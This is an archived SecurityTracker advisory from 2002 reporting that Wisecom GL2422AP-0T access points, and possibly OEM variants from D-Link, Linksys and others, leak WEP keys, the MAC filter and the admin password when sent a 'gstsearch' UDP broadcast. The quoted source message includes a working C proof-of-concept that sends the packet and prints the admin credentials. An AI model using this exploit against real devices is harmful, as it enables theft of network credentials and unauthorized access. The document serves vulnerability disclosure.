SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   Wireless Access Point (Wisecom) Vendors:   Wisecom
Wisecom Wireless Access Point Discloses Encryption Keys and Passwords to Remote Users
SecurityTracker Alert ID:  1005531
SecurityTracker URL:  http://securitytracker.com/id/1005531
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 5 2002
Impact:   Disclosure of authentication information, Disclosure of system information, User access via network
Exploit Included:  Yes  
Version(s): GL2422AP-0T
Description:   A vulnerability was reported in a Wisecom Wireless Access Point device, manufactured by Global Sun Technologies. The device discloses WEP keys, the administrator password, and other information to remote users.

It is reported that a remote user on the local network or on the wireless network can send a broadcast packet to UDP port 27155 containing the string "gstsearch" to cause the device to return sensitive information. According to the report, the device will return the WEP keys, the mac access control filter, and the 'admin' account password.

The vulnerabile device is apparently sold to other manufacturers, so additional vendor models may be vulnerable. Some of the potentially affected models may include:

D-Link DWL-900AP+ B1 version 2.1 and 2.2
ALLOY GL-2422AP-S
EUSSO GL2422-AP
LINKSYS WAP11-V2.2

A demonstration exploit is provided in the Source Message.

Other users report that the D-Link DI-614+ (apparently based on the affected GL2422RT) is not vulnerable but the Linksys WAP11-V2.2 appears to be at least partially affected.

Impact:   A remote user on the local network or the wireless network can obtain the device's WEP keys, mac filter, and 'admin' account password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  wisecom-europe.com/wireless-1.htm (Links to External Site)
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  Accesspoints disclose wep keys, password and mac filter (fwd)



KHAMSIN Security News
KSN Reference: 2002-11-01 0001 ULO
---------------------------------------------------------------------------

Title
-----
        Accesspoints disclose wep keys, password and mac filter

Date
----
        2002-11-01


Description:
------------

GlobalSunTech develops Wireless Access Points for OEM customers like
Linksys, D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T
during the setup phase showed a security problem.

Sending a broadcast packet to UDP port 27155 containing the string
"gstsearch" causes the accesspoint to return wep keys, mac filter and
admin password. This happens on the WLAN Side and on the LAN Side.


Systems Affected
----------------
        Vulnerable, tested, OEM Version from GlobalSunTech:
                WISECOM GL2422AP-0T

        Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
                D-Link DWL-900AP+ B1 version 2.1 and 2.2
                ALLOY GL-2422AP-S
                EUSSO GL2422-AP
                LINKSYS WAP11-V2.2


Proof of concept:
-----------------

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>

typedef struct {
        char type[28];
        char name[32];
        char user[16];
        char pass[16];
}
__attribute__ ((packed)) answer;

int main()
{
        char rcvbuffer[1024];
        struct sockaddr_in sin;
        answer* ans = (answer *)rcvbuffer;
        int sd, ret, val;

        sin.sin_family          = AF_INET;
        sin.sin_addr.s_addr     = inet_addr("255.255.255.255");
        sin.sin_port            = htons(27155);

        sd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sd < 0)
                perror("socket");

        val = 1;
        ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
        if (ret < 0)
        {
                perror("setsockopt");
                exit(1);
        }

        ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
        if (ret < 0)
        {
                perror("sendto");
                exit(1);
        }

        ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));

        printf("Type            : %s\n",ans->type);
        printf("Announced Name  : %s\n",ans->name);
        printf("Admin Username  : %s\n",ans->user);
        printf("Admin Password  : %s\n",ans->pass);

        return 0;
}

Disclaimer
-----------

        This advisory does not claim to be complete or to be usable for
        any purpose. Especially information on the vulnerable systems may
        be inaccurate or wrong. Possibly supplied exploit code is not to
        be used for malicious purposes, but for educational purposes only.
        This advisory is free for open distribution in unmodified form.

        http://www.khamsin.ch




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC